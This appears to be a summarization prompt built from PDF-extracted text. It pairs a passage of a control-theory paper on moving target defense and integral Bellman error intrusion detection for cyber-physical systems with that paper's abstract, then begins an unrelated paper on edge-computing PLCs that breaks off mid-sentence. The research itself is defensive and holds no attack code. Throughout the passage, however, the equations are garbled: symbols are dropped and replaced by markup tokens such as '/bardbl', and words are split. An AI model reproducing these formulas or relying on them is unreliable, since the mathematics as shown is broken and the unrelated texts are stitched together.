BiKi)x ex=(A BiKi)ex+Bi( I)Kixc. Due to the assumption that x (t0)=xc(t0),w eh a v e e(t0)=0 and ex(t)=/integraldisplayt t0e(A BiKi)(t )Bi( ( ) I)Kixc( )d which, after taking norms, yields /bardblex(t)/bardbl/lessorequalslant/integraldisplayt t0/bardble(A BiKi)(t )/bardbl/bardblBi/bardbl/bardblI ( )/bardbl/bardblKi/bardbl/bardblxc( )/bardbld . Utilizing now the bound (22), we can further write /bardblex(t)/bardbl/lessorequalslant/integraldisplayt t0/bardblBi/bardbl/bardblI ( )/bardbl/bardblKi/bardbl/bardble(A BiKi)(t )/bardbl /bardblx(t0)/bardble/integraltext t0 i( )/bardblI ( )/bardbld d =/integraldisplayt t0 i( )/bardblI ( )/bardbl/bardblx(t0)/bardble/integraltext t0 i( )/bardblI ( )/bardbld d . By using i(t, )=/integraldisplayt t0 i(t)/bardblI (t)/bardble/integraltextt t0 i( )/bardblI ( )/bardbld d for which it holds that i(t, )/negationslash=0, /negationslash=I, we can write the bound on the trajectory error as /bardblex(t)/bardbl/lessorequalslant i( , )/bardblx(t0)/bardbl. /squaresolid Remark 7: It can be seen that i( , )=0 , if and only if (t)=I, t [t0,t1]. /square Theorem 3: Consider that the system is operating with Ki K, designed based on (7) and (8). De ne the detection signal over a prede ned time window T> 0 e(t)= Vi(xc(t T)) Vi(xc(t)) /integraldisplayt t T(xT cQixc+u T iRiu i)d . (24) Then, the system is under attack if and only if e(t)/negationslash=0. The op- timality loss due to the attacks, quanti ed by /bardble(t)/bardbl, is bounded for any injected signal (t)that is integrable. Proof: As was proven in [38], (24) is the integral form of the Bellman equation. For the sampled value of the state at Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:13 UTC from IEEE Xplore. Restrictions apply. KANELLOPOULOS AND VAMVOUDAKIS: A MOVING T ARGET DEFENSE CONTROL FRAMEWORK FOR CYBER-PHYSICAL SYSTEMS 1035 t1=t T, we have that Vi(t T)=xT(t T)Pix(t T) = min ui/braceleftbigg/integraldisplayt t T(xTQix+uT iRiui)d + Vi(t)/bracerightbigg . SincePi/follows0we have Vi(t T)=xT(t T)Pix(t T) = min ui/braceleftbigg/integraldisplayt t T(xTQix+uT iRiui)d /bracerightbigg +xT(t)Pix(t). For the accumulated cost utilizing the optimal input, and the cost utilizing an arbitrary input ua, it holds that /integraldisplayt t T(xTQix+u iRT iu i)d = min ui/braceleftbigg/integraldisplayt t T(xTQix+uT iRiui)d /bracerightbigg /lessorequalslant/integraldisplayt t T(xTQix+uT aRiua)d /integraldisplayt t T(xTQix+u iRT iu i)d =/integraldisplayt t T(xTQix+uT aRiua)d I( ). Due to Assumption 4, the solution is unique. By extension, the optimal cost over any time interval is also unique. Consequently, the system is attack-free when I( )=0 . For the boundedness part of the proof, we adopt the notation of Lemma 1. Along the actual trajectory of the system within a time interval [t0,t1], the intrusion detection signal is e(t)=xT c(t0)Pixc(t0) xT c(t1)Pixc(t1) /integraldisplayt1 t0(xT c( )Qixc( )+u T i(xc)Riu i(xc))d . Since, the control signal utilized by the controller will be optimal, we can write, t/greaterorequalslant0 e(t)=xT c(t0)Pixc(t0) xT c(t1)Pixc(t1) /integraldisplayt1 t0/parenleftbig xT c( )Qixc( ) +/parenleftbig R 1 iBT iPixc( )/parenrightbigTRi/parenleftbig R 1 iBT iPixc( )/parenrightbig/parenrightbig d e(t)=xc(t0)TPixc(t0) xc(t1)TPixc(t1) /integraldisplayt1 t0xT c( ) Qixc( )d where Qi=Qi+PiBiR 1 iBT iPi/follows0. The positive de nite- ness is derived by the asymptotic stability property of the opti- mal closed-loop system. We substitute the actual trajectory xc(t), utilizing the trajec- tory error (23), to write e(t)=xT c(t0)Pixc(t0) /parenleftbig x (t1)+ex(t1)/parenrightbigTPi/parenleftbig x (t1)+ex(t1)/parenrightbig /integraldisplayt1 t0/parenleftbig x ( )+ex( )/parenrightbigT Qi/parenleftbig x ( )+ex( )/parenrightbig d which can be rewritten as e(t)=xT c(t0)Pixc(t0) x T(t1)Pix (t1) /integraldisplayt1 t0x ( )T Qix ( ) /braceleftbigg eT x(t1)Pix (t1)+x T(t1)Piex(t1) +eT x(t1)Piex(t1) +/integraldisplayt t0(eT x( ) Qix ( )+x T( ) Qiex( ) +eT x( ) Qiex( ))d /bracerightbigg . It can be seen that the rst three terms of the above-mentioned expression satisfy the integral form of the HJB equation. As a result, the residual terms that quantify the optimality loss due to the attack are e(t)= /braceleftbig eT x(t1)Pix (t1)+x T(t1)Piex(t1) +eT x(t1)Piex(t1) +/integraldisplayt t0(eT x( ) Qix ( ) +x T( ) Qiex( )+eT x( ) Qiex( ))d /bracerightbig . Taking norms, and utilizing the fact that x (t)= e(A BiKi)(t t0)x(t0)as well as Lemma 1, we can bound the norm of the intrusion detection signal as /bardble(t)/bardbl/lessorequalslantbi(t, )/bardblx(t0)/bardbl2 where bi(t, )=2 i(t, )/bardblPi/bardbl i+ 2 i(t, )/bardblPi/bardbl +/integraldisplayt t0/parenleftbig 2 i( , )/bardbl Qi/bardbl i+ 2 i( , )/bardbl Qi/bardbl/parenrightbig d with the property that bi(t, )=0 , t [t0,t1]if and only if (t)=I. /squaresolid Remark 8: We note that in the notation of Lemma 1 and Theorem 3, both the state trajectories x (t),xc(t)and the error signals ex(t),e(t)were not dependent on the active mode i even if their dynamics were. This is due to the fact that since the different modes operate sequentially, the defender computes only a single error signal at each time instant. /square Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:13 UTC from IEEE Xplore. Restrictions apply. 1036 IEEE T RANSACTIONS ON AUTOMATIC CONTROL, VOL. 65, NO. 3, MARCH 2020 Algorithm 1: Proactive/Reactive Defense Mechanism for Actuator Attacks. 1: procedure 2: Given an initial state x(t0), and a time window T. 3: Find all permutations of actuators (columns of B) and derive the subset of controllable pairs (A,B i), denoted byK. 4: fori=1,..., card (K) 5: Compute the optimal feedback gain and Riccati matrices Ki,Piaccording to (7) and (9). 6: Compute the optimal cost of each controller for the given x(t0). 7: end for 8: Solve for the optimal probabilities p iusing (10). 9: At t=t0, choose the optimal controller for which (t0) = arg min i/parenleftbig x(t0)TPix(t0)/parenrightbig . 10: while (t)=iandt< D 11: Compute the integral Bellman error detection signal using (24). 12: Propagate the system using (5). 13: end while 14: Choose the random mode (t+ D)=jand go to 9. 15: if/bardblei(tc)/bardbl>0 16: Take the i-th controller of ine. 17: Switch to the controller with the best performance, (tc) = arg min i K\i/parenleftbig x(t0)TPix(t0)/parenrightbig and go to 9. 18: end if 19: end procedure D. Proactive and Reactive Defense for Actuator Attacks Under safe operation, the system switches between the avail- able modes with MTD in order to have guaranteed stability and maximal unpredictability, according to (11). If we can nd i:ei(tk)/negationslash=0, then we can conclude that the ith mode is consid- ered under attack, and isolated. Speci cally, the system switches to the controller with the best performance and the compromised ith mode is taken out of the queue for the MTD switching. The pseudocode for the proactive and reactive defense system is provided in Algorithm 1. Fact 3: It has been shown that pi>0, i {1,..., card (K)}. Consequently, there exists a t fsuch that [t0,t f]with ( )=i, i {1,..., card (K)}and an arbitrary t0>0. This means that, since the probability that all controllers will eventually be active, there is some time interval long enough, such that we have already switched through every available controller. /square Theorem 4: Suppose that the (1), uses the framework of Al- gorithm 1. Then, the closed-loop system has an asymptotically stable equilibrium point given that the attacker has not compro- mised all the available controllers, i.e., K\K c/negationslash= , where Kc is the subset of those controllers that have been compromised by an attacker. Proof: We consider a trajectory of the system within the time interval t [t0,tf],tf>t f. Denote by Kuthe set of safe controllers and Kcthe set of compromised ones. Recall thataccording to Algorithm 1 and Theorem 4, the controller will stay at a compromised mode during [t,t+T]. Since the MTD algorithm is constrained by an average dwell time, for any part of the trajectory t [tk,tk+1]where a compromised controller has not been utilized, it holds according to Theorem 2, that /bardblx(tk+1)/bardbl</bardblx(tk)/bardbl. (25) We now need to take into account those instances where, after detecting a compromised controller Ki, the system immediately switches to another controller, which is also compromised. For Nsubsequent switches to compromised controllers, due to Lemma 1, those parts of the trajectory for t [tk,tk+1]= [tk,tk+ T]are bounded by a positive de nite function i( , ) as /bardblx(tk+ T)/bardbl/lessorequalslant (tk+ T)( ,T )/bardblx(tk+( 1)T)/bardbl /lessorequalslant (tk+ T)( ,T ) (tk+( 1)T)( ,T ) /bardblx(tk+( 2)T)/bardbl /lessorequalslant /productdisplay i=1 i( ,T )/bardblx(tk)/bardbl. (26) Furthermore (26) can be upper bounded as /bardblx(tk+ T)/bardbl/lessorequalslant(max i Kc( i( ,T ))) /bardblx(tk)/bardbl. Due to the fact that i( (t),T)>0, i, we can conclude that the parts of the trajectory where the compromised and safe modes are interchanged, are upper bounded by the same tra- jectory driven only by compromised modes, by combining the inequalities (25) and (26). By Assumption 3, the attacker under nite resources is able to compromise a number Nof the available controllers, i.e., card (Kc)/lessorequalslantN. Using Algorithm 1, and Fact 3, there is a time tp<tfsuch that all the compromised controllers have been detected by the integral Bellman detector and have been isolated from the switching queue of the MTD. Consequently, recalling that every closed-loop matrix Ai= A BiKiis Hurwitz, there exist positive numbers Ki,aisuch that,/bardble Ait/bardbl/lessorequalslant Kie ait, one has /bardblx(tf)/bardbl/lessorequalslant Kie ait/bardblx(tp)/bardbl /lessorequalslant Kie ait/parenleftbigg max i Kc( ( ,T ))/parenrightbigg /bardblx(t0)/bardbl. It can be seen that the remaining trajectory converges to the origin exponentially fast with rate that depends on the slowest safe controller. As a result, if the set of the safe controllers is not empty, the trajectory is guaranteed to asymptotically go to zero as tf . /squaresolid 1) Intrusion Detection Under Actuation Noise: It is pos- sible to extend the results of the previous section to take into account noise in the actuation mechanism, i.e., in (1) ua(t)= (t)u (t)+w(t) where w(t)is a bounded but otherwise unknown disturbance with/bardblw(t)/bardbl/lessorequalslant w. Theorem 5: System (1), equipped with the MTD control scheme described in Section III and the detection mechanism as Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:13 UTC from IEEE Xplore. Restrictions apply. KANELLOPOULOS AND VAMVOUDAKIS: A MOVING T ARGET DEFENSE CONTROL FRAMEWORK FOR CYBER-PHYSICAL SYSTEMS 1037 de ned in Theorem 3, under the effect of a disturbance w(t)is compromised if /bardble(t)/bardbl/greaterorequalslantei,thres (t) where ei,thres are the dynamic thresholds for each mode of the form ei,thres (t)=2/bardbl w/bardbl/integraldisplayt t T/bardblRiu i( )/bardbld + (Ri)/bardbl w/bardbl2. Proof: First, we will consider the system in the absence of attacks and formulate the intrusion detection signal based on the data collected along the trajectories of the system. In other words, we can write e(t)= Vi(t T) Vi(t) /integraldisplayt t T(xTQix+uT aRiua)d = Vi(t T) Vi(t) /integraldisplayt t T/parenleftbig xTQix +(u i+w)TRi(u i+w)/parenrightbig d = Vi(t T) Vi(t) /integraldisplayt t T(xTQix+u T iRiu i)d /integraldisplayt t T(wTRiu +u T iRiw +wTRiw)d . Leveraging the integral Bellman equality and taking norms yield /bardble(t)/bardbl/lessorequalslant2/integraltextt t T/bardblwTRiu i/bardbld +/integraltextt t T/bardblwTRiw/bardbld /bardble(t)/bardbl/lessorequalslant 2/bardbl w/bardbl/integraltextt t T/bardblRiu i( )/bardbld +T (Ri)/bardbl w/bardbl2 which is the adaptive threshold for the active controller i./squaresolid Remark 9: It should be noted that the adaptive threshold can be computed online utilizing only knowledge of the optimal input signal that the controller sends to the system (and not the potentially corrupted one). /square Remark 10: In noisy environments, the system may be un- der attack, and the integral Bellman error may not cross the adaptive threshold. Thus, the attack shall remain undetected. However, attacks that have so little effect on the system become indistinguishable from random noise and do not degrade the performance of the system in a signi cant way. /square IV . D EFENSE AGAINST SENSOR ATT ACKS In this section, we show how the methods developed can be applied to securely estimate the state of a system with compro- mised measurements by employing sensor redundancy. A. Candidate Sensors Sets Similarly to the proposed framework for the actuators, we introduce the set of all sensors, denoted by C, and the elements of its power set Ci 2C, andCi Ciis a combination of the different rows of C.The set of candidate sensing modes Sois de ned as the set of the sensor combinations that renders system (1) fully observable So=/braceleftbig Cj 2C:rank Cj CjA ... CjAn 1 =n/bracerightbig . The system utilizing the sensor combination Ciis x=Ax+Bu yi=Cix. Remark 11: We note the distinction between the set of sen- sorsCand the set of sensing modes So. The set of sensors contains the different physical components that measure parts of the system s behavior. On the other hand, the set of sens- ing modes contains those cooperating sensors together with an observer scheme that reconstruct an estimate of the system state. /square B. Optimal Observer Design and MTD for Sensor Attacks The observer of (1) will be now designed as a dynamic system sharing the same structural properties x=A x+Bu +B ui yi=Ci x (27) where x, yiare the estimates of the state and the output, re- spectively, uidenotes a ctional input, i.e., a correction term, which forces the observer to track the actual system. Remark 12: The state estimate xis independent of the active sensing mode. On the other hand, the output yiand ctional input uiare not. /square Following the work of [39], [40], to design the optimal ui, we de ne the optimization problem based on the following cost function t/greaterorequalslant0 U i( x) = min ui/integraldisplay t/bracketleftbig ( yi yi)TQi( yi yi)+ uT iRi ui/bracketrightbig d . De ning the Hamiltonian of the system as Hi( x, u i,U i)=( yi yi)TQi( yi yi)+ u T iRi u i + U T i(A x+Bu +B u i)=0. (28) We can now nd the optimal control from the stationarity conditions Hi( x, u i,U i) u i=0. This leads to u i= R 1 iBT U i( x). Due to the quadratic structure of the cost functional and the linear structure of the dynamic system, we assume that the value function is quadratic in x(t), i.e., U i( x)= xTGi x, G i/follows0, which means that the optimal input is u i= R 1 iBTGi x. (29) In this section, we show how the same techniques introduced and analyzed in the previous sections can be applied to detect and mitigate sensor attacks. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:13 UTC from IEEE Xplore. Restrictions apply. 1038 IEEE T RANSACTIONS ON AUTOMATIC CONTROL, VOL. 65, NO. 3, MARCH 2020 C. MTD for Sensor Attacks Theorem 6: The state estimation scheme utilizing optimal observers as described by (27), for every sensing mode in Sohas an asymptotically stable equilibrium point under a switching- based MTD mechanism given that the switching signal has the average dwell time D>log/parenleftbig max q,p {1,..., card (So)} (Gp) (Gq)/parenrightbig minp {1,..., card (So)} (CT iQpCi+GpBpR 1pBTpGp) (Gp). Proof: The proof follows closely Theorem 2 for the switched observer comprised of different sensing modes and by taking into account the optimal control problem formulated in this section by (29) and (28). /squaresolid Remark 13: The optimization problem solved in Section III- C is identical for the case of sensor switching. As a re- sult, the probability that a certain sensing mode Siis active, obeys (10). /square D. Integral Bellman Based Intrusion Detection for Sensor Attacks We will now introduce a detection signal based on the online, possibly compromised, estimations of the state, which we will denote xc(t). For that reason, we formulate the function Ui(t)= xT cGi xc,Gi/follows0. Theorem 7: Consider system (1) operating with the sensor mode Si S , designed based on (28) and (29). De ne the de- tection signal over a prede ned time window T> 0as es(t)= Ui( xc(t T)) Ui( xc(t)) /integraldisplayt t T/parenleftbig (yi yi)TQi(yi yi)+ u T iRi u i/parenrightbig d . (30) Then, the system is under attack if and only if es(t)/negationslash=0. More- over, the optimality loss due to attacks, is bounded for any injected signal s(t). Proof: The rst part of the proof follows from Theorem 2, for the optimal control problem formulated in this section, and is based on the uniqueness of optimal solutions for a given initial condition. However, to compute the bound on the optimality/observation loss, we de ne the measurement error yi=yi yi. Then, the detection signal is es(t)= Ui( xc(t T)) Ui( xc(t)) /integraldisplayt t T( yT iQi yi+ uT iRi ui)d . Note that, in the presence of attacks yi yi= sCi x Ci x= yi+ s i( s) where s i( s)=(I s)Ci x. Therefore, the detection signal under attack is es(t)= Ui( xc(t T)) Ui( xc(t)) /integraldisplayt t T/parenleftbig ( yi+ s i( s))TQi/parenleftbig yi+ s i( s)) + uT iRi ui/parenrightbig d .Algorithm 2: Proactive/Reactive Defense Mechanism for Sensor Attacks. 1: procedure 2: Given initial state x(t0), system dynamics (1) and time window T. 3: Find all permutations of sensors (rows of C) and derive the subset of observable pairs (A,C i), denoted So. 4: fori=1,..., card (So) 5: Compute the optimal ctional input and value function according to (28) and (29). 6: Compute the optimal cost of each observation mode for the given x(t0). 7: end for 8: Solve for the optimal probabilities p iusing (10). 9: At t=t0, choose the optimal observer. 10: while (t)=iandt< D 11: Compute the integral Bellman error detection signal using (30). 12: Propagate the system using the observer dynamics. 13: end while 14: Choose a random mode (t+ D)=jand go to 9. 15: if/bardbles(tc)/bardbl>0 16: Take the i-th observer of ine. 17: Switch to the safe observer with the best performance and go to 9. 18: end if 19: end procedure Expanding the quadratic terms, the residual detection signal becomes es(t)= /integraldisplayt t T/parenleftbig sT i( s)QiCi x+(Ci x)TQi s i( s) + sT i( s)Qi s i( s)/parenrightbig d . Taking into account the Cauchy Schwartz inequality, we can bound the norm of the error as /bardbles(t)/bardbl/lessorequalslant2/integraldisplayt t T/bardblCi x/bardbl/bardbl s i( s)/bardbl+T (Qi)/bardbl s i( s)/bardbl. /squaresolid Remark 14: The bound on the optimality/observation loss can be quanti ed more easily, because the injected attack does not directly affect the dynamics in system (1), rather it behaves like a noise in the cost term de ned by the output error (yi yi)TQi(yi yi). /square E. Proactive and Reactive Defense for Sensor Attacks We will now combine the proactive defense mechanism with the intrusion detection system described above. The pseudocode for the operation is presented in Algorithm 2. Remark 15: We can combine the algorithmic frameworks presented for both actuators and sensor attacks. However, the result would be conservative, since the two problems are cou- pled. Consequently, we cannot differentiate between integral Bellman errors caused by an actuator or a sensor attack. /square Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:13 UTC from IEEE Xplore. Restrictions apply. KANELLOPOULOS AND VAMVOUDAKIS: A MOVING T ARGET DEFENSE CONTROL FRAMEWORK FOR CYBER-PHYSICAL SYSTEMS 1039 Fig. 1. Evolution of the MTD switching signal that guarantees actuator proactive security. It can be seen that controller with index 4 is preferred since it is the most optimal. Fig. 2. Evolution of the MTD state that guarantees actuator proactive security. With the appropriate dwell-time, the system remains stable. V. S IMULA TION In order to show the effectiveness of our approaches we will use a linearized ve-dimensional model of the ADMIRE bench- mark aircraft [41]. The model has seven redundant actuators and two redundant sensors. Initially, we present results for the prob- lem of controlling the plant in an adversarial environment. Fig. 1 shows the switching signal for the MTD framework applied to actuator attacks. It can be seen that the actuator with index 4 is the preferred one. This is due to its overall optimality compared to the rest of the actuator modes. Fig. 2 shows convergence of the states under actuator MTD. Under the appropriate dwell time, the switching system remains asymptotically stable. In Fig. 3 , we can see the evolution of the states under an attack signal fort [15,20] where only the intrusion detection system was utilized. In Fig. 4 , we see the evolution of the integral Bellman error. Although its magnitude is small, due to the absence of stochastic noise, the integral Bellman error is still able to detect the attack.Fig. 3. Evolution of the states in the presence of actuator attacks. The attack takes place for t [15,20]. Fig. 4. Evolution of the integral Bellman error. For the time interval where the attacker inputs an adversarial signal, t [15,20], the integral Bellman error is nonzero, which is enough to achieve intrusion detection in the absence of stochastic noise. InFig. 5 , we combine the reactive and the proactive secu- rity system. The adversary manages to completely shut down one of the actuators belonging to the most optimal controller int=6 s. It is clear that the system is stabilized. In Fig. 6 , we show the evolution of the random switching signal favor- ing the controller with the best performance. After an attack is detected the compromised component is taken out of the switch- ing queue. However, even without the compromised mode, the MTD structure still operates. This way, we maintain some level of unpredictability, while guaranteeing attack-free operation of the system. We note that, the more compromised modes we have, the less unpredictable the system will be. However, once a mode has been taken out of the switching queue, of ine methods may be utilized to repair it and reintroduce it to the MTD. In Fig. 7 , we consider a system under actuator attacks in the pres- ence of system noise. Speci cally, the noise had known upper bound /bardblw/bardbl=0.5, while the attack was a random signal with maximum value of 0.3. We note from Fig. 8 , that the intrusion Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:13 UTC from IEEE Xplore. Restrictions apply. 1040 IEEE T RANSACTIONS ON AUTOMATIC CONTROL, VOL. 65, NO. 3, MARCH 2020 Fig. 5. Evolution of the state with both proactive and reactive defense. Even in the presence of attacks, the system converges to the origin, since the attacked components have been taken of ine. Fig. 6. Evolution of the switching signal with both proactive and reactive defense. It can be seen that when the adversarial signal is detected in the fourth controller, the random switching persists, but never chooses the compromised con guration. Fig. 7. State evolution of a system with noise and actuator attacks. We note that the attack takes place at t=[ 1 5,20].Fig. 8. Evolution of the integral Bellman error for the system under attack, as well as evolution of the adaptive threshold that takes into account the system noise. Despite the magnitude of the attack being smaller than the noise, the proposed algorithm is able to detect the intrusion. Fig. 9. Optimal state estimation under noisy measurements and in- jected sensor attack. The attacker corrupts the output of the sensor for t [10,20]by adding a constant bias. detection signal is able to detect the injected signal despite the noise. Also, we consider the optimal state estimation problem for the ADMIRE aircraft utilizing the optimal observer framework. The state evolution of the observer is shown in Fig. 9 .W e notice that the attacker injects a relatively small bias to the estimated signal. For the sensor attacks, we take into account noise (with known statistics) on the measurements and show the evolution of the integral Bellman error and of the adaptive threshold in Fig. 10 . Even though the discrepancy between the estimated angle of attack and the actual one is small relative to the measurement noise, the integral Bellman error manages to detect the attack. Speci cally, during t [14,16], we detect the difference between the estimated error (due to sensor noise) and the one induced by the attack. Although the advantages of the model-free integral Bellman error based intrusion detection mechanism can be seen when the Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:13 UTC from IEEE Xplore. Restrictions apply. KANELLOPOULOS AND VAMVOUDAKIS: A MOVING T ARGET DEFENSE CONTROL FRAMEWORK FOR CYBER-PHYSICAL SYSTEMS 1041 Fig. 10. Evolution of the integral Bellman error and adaptive threshold for successful state reconstruction in the presence of sensor attacks. Even taking into account the noise of the sensors, the attack is detected. Fig. 11. Optimality loss (difference between actual cost during the sys- tem run, and the value function of the most optimal controller) induced by the unpredictable controllers for different entropy levels. By increasing the weight on the entropy, we reach a maximum optimality loss in the case of the uniform distribution. system is under attack, due to its proactive nature the success or failure of an MTD system is not easily obvious. Furthermore, the optimality loss induced by the use of non-overall-optimal controllers must be examined. The optimality loss was assessed as the difference between the actual cost during the system run, and the value function of the most optimal controller. To obtain some rst validation results for our MTD algorithm, random attack vectors were considered for multiple runs of the system. InFig. 11 , we present the average cost of the system as the unpredictability increases. We can see that the cost converges to a maximum value for uniform distribution over all the avail- able controllers. In Fig. 12 , the compromise between security against attacks and optimality is highlighted. Speci cally, as we increased the weight on entropy, i.e., the parameter /epsilon1, then the system switches more aggressively. This leads to the decrease of successful attacks, since the attack is less probable to affect a mode that is in use. However, as /epsilon1increases, the system utilizesFig. 12. Optimality loss and rate of successful attacks as a function of the entropy. Increase of the weight on unpredictability leads to perfor- mance degradation but manages to secure the system from attacks. Fig. 13. Evolution of the integral Bellman error of the observer under actuator attacks. This signal is induced by the interconnection between the optimal control problems solved for control and estimation. the overall optimal controller less, until it reaches the uniform distribution over the different modes. Fig. 13 shows the integral Bellman error of the observer under actuator attacks. We note that even though the design processes of the secure optimal controller and the secure optimal observer are separate, attacks in one subsystem (in this case, in the con- troller) may induce integral Bellman error to the other one (in this scenario, in the observer). However, we are still able to identify a speci c controller/observer pair that has been com- promised and switch to a different one as described. VI. C ONCLUSION AND FUTURE WORK This paper proposes a proactive and reactive defense switch- ing mechanism against actuator and sensor attacks in CPS. The proactive defense is based on the framework of MTD and max- imizes the unpredictability of the system. A novel intrusion detection mechanism, based on the performance evaluation, is used to isolate the attacked actuators and sensors. The system Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:13 UTC from IEEE Xplore. Restrictions apply. 1042 IEEE T RANSACTIONS ON AUTOMATIC CONTROL, VOL. 65, NO. 3, MARCH 2020 utilizing both reactive and proactive defenses is proven to have an asymptotically stable equilibrium point provided the attacker did not compromise all the controllers and sensors simultane- ously. Simulations on a linearized aircraft model are provided to show the ef ciency of our approach. Future research efforts will focus on incorporating learning mechanisms with attackers of different rationality, i.e., bounded reasoning. Furthermore, we will combine the proposed intru- sion detection system with reinforcement learning techniques to develop a CPS framework, which is able to learn optimal behaviors and defend against attackers without knowledge of the model. Moreover, we will investigate attacks that operate between different layers of the CPS, such as the communication and the computation layers. Finally, experiments will be con- ducted to investigate the practicality of our approach in real-life environments and under realistic attacks.
Summary:
This paper considers the problem of ef ciently and securely controlling cyber-physical systems that are operating in uncertain, and adversarial environments. To mitigate sensor, actuator attacks, and performance loss due to such attacks, we formulate a secure control algorithm that consists of a proactive and a reactive defense mechanism. The proactive mechanism, which is based on the principles of moving target defense, utilizes a stochastic switching structure to dynamically and continuously alter the param- eters of the system, while hindering the attacker s ability to conduct successful reconnaissance to the system. The unpredictability of the current actuator and sensor is opti- mized using an information entropy measure, which is in- duced by probabilistic switching. The reactive mechanism on the other side, detects potentially attacked components, namely sensors and actuators, by leveraging online data to compute an integral Bellman error. A rigorous mathemati- cal framework is presented to guarantee the stability of the equilibrium point of the closed-loop system, and provide a quanti ed bound on the performance loss when utilizing both reactive and proactive mechanisms. Simulation results show the ef cacy of the proposed approaches on a bench- mark aircraft model.
|
Summarize:
Keywords- Edge computing, PLCs, Industry automation I. INTRODUCTION Industrial revolutions have changed the way of manufacturing and production of goods by utilizing disruptive new technologies. The first industrial revolution, starting in the late 18th century, introduced water and steam power that replaced human and animal labor [1]. One century later, the second revolution, characterized by new power sources (e.g. electric power) and the introduction of assembly lines, brought mass production to life. The third revolution began in the middle of the 20th century, with emphasized use of digital technologies. Industrial computers, designed to operate in the industrial environment, as well as advanced telecommunications, were incorporated into factories and all that led to the digital transformation of industry. During this revolution, the control of industrial processes shifted from robust relay logic systems to Programmable Logic Controllers (PLCs). With PLCs, a functional connection was established between digital/analog inputs [2] and outputs as well as the development of flexible control algorithms. The ongoing transformation of industry coined as the fourth industrial revolution or Industry 4.0 was introduced in 2011 to describe the vision of German industry driven by the Internet [3]. Industry 4.0 has the aim of increasing productivity, efficiency, safety, and transparency in the industry through a high level of integration between information and communication technologies and machines in cyber-physical systems (CPS) [4]. Different new revolutionizing technologies such as the Industrial Internet of Things - IIoT are enablers of ongoing transformation [5], as shown in Fig. 1. In the paradigm of IIoT, a significant number of connected types of machinery and objects are generating a vast quantity of data. Another characteristic of industrial applications is the necessity of real-time analyses and decision-making, which makes them latency-sensitive applications. Enormous quantity of data that needs to be transmitted and analyzed in a fast and secured environment may act as a challenge to a centralized cloud computing platform. To overcome the limitations of cloud computing and to satisfy the challenging conditions which arise in Industry 4.0, the computing power is being brought closer to the data sources through Edge computing architecture, making Edge computing a part of the Industry4.0 portfolio, as discussed in [6] and emphasized in [7]. Due to the increase in the performance of computers and processing as well as the enhancement of storage capacities, Edge computing brings new opportunities to data manipulation [8]. PLCs are positioned on the very end of industrial network, where their traditional role is getting involved through the adaptation of Edge computing principles [9]. This paper will provide the review of edge PLCs i.e., the PLCs that are implementing Edge computing. 2022 21st International Symposium INFOTEH-JAHORINA (INFOTEH) | 978-1-6654-3778-3/22/$31.00 2022 IEEE | DOI: 10.1109/INFOTEH53737.2022.9751324 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:08 UTC from IEEE Xplore. Restrictions apply. Level 0Level 1Level 2Level 3Level 4 ERP MES SCADA/HMI PLCs/PACs SENSORS/ACTUATORS Figure 3: ISA-95 standard reference architecture [20] This paper is structured as follows: Section 2 provides an overview of Edge computing. How industrial automation has changed the implementation of the Edge computing paradigm is discussed in Section 3, which also provides an overview of one of the reference architectures that are accommodating edge principles. Section 4 provides a comparison of three edge PLCs. II. EDGE COMPUTING At first glance, Edge computing represents a new computing paradigm that acts as a successor of the Cloud era in the history of computer technology, but the first ideas of Edge computing can be traced back to the 1990s and content delivery networks [10]. Even though the ideas of edge were planted over 30 years ago, Cloud computing was predominant during that time. Cloud computing delivered a revolutionary approach to data processing that enabled high-end data manipulation that originated from devices with modest processing capabilities. As mentioned in [11], 75% of enterprises will have adopted distributed processing without a data center or cloud by 2022, making Edge computing the main processing solution. Although edge is becoming predominant, there is still a strong connection between edge and cloud. Cloud is still suitable for non-real-time big data analysis, which is business-oriented, while Edge computing provides data analysis on local scope, which is usually real- time and control-oriented. Significant part of the computing and even storage is transferred from the cloud to the edge, making cloud servers less loaded [12]. Cloud still has an important role, as data is continuing to be transferred for further analysis and storage. Bringing computing closer to the physical layer of a network not only reduces latency and usage of network resources, but also strengthens data security [12]. The main difference between Cloud and Edge computing is the server location: cloud services are located within the Internet while services provided through Edge computing lay in the edge of the network [12]. Figure 2: Connection cloud-edge-devices (Image source: Techtarget) Edge computing architecture can be presented in the form of a three-layer architecture [13], as shown in Fig 2, or in in four layers representation of edge architecture where Internet gateways are independent entities [14]. Presented architecture describes a synergy between edge devices, or devices that collect data, Edge computing nodes or short edge nodes and cloud servers. Functions of edge nodes depend on their possible location, including macro base stations, IoT gateways, 5G base stations, etc., as well as on their distance from the user [15]. Edge analytic or a process of gathering and analyzing data on the edge of the network has a few major advantages [14]: reduced latency and storage costs, scalability, bandwidth reduction, increased cost-effectiveness and privacy and security preservation. Application domain of Edge computing is wide: from virtual reality [15], applications using 5G networks [16], transportation [17], to smart grids [18]. From 107 concrete user cases retrieved from comprehensive market analyses, available in [19] 10% belongs to the industry domain. Constraint of Edge computing on industrial automation will be discussed next. III. INDUSTRIAL AUTOMATION TRADITIONAL CONCEPT AND EDGE COMPUTING CONCEPT The International Society of Automation has developed the ISA-95 standard to describe the interface between control automation systems and enterprises. Pursuant to this standard, industrial automation systems follow 5-level reference architecture, as shown in Fig 3 [20]. Automation control, a symbiose of sensor/actuators and PLC/PACs, is placed on Levels 0 and 1. SCADA (Supervisory Control And Data Acquisition) used for monitoring is positioned on Level 2. Those levels require short response time and real-time analysis. MES (Manufacturing Execution Systems) on Level 3 and ERP (Enterprise Resource Planning) on Level 4 require information on a daily or weekly basis. A high volume of opportunities for research comes together Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:08 UTC from IEEE Xplore. Restrictions apply. Mass and Heterogeneous Connection Real -time Services Data Optimization Smart Applications Security and Privacy ProtectionC R O S SVALUES Figure 4: CROSS values of Edge computing [22] Physical world Cyber worldCLOUD TIER EDGE TIER FIELD TIERPLANT 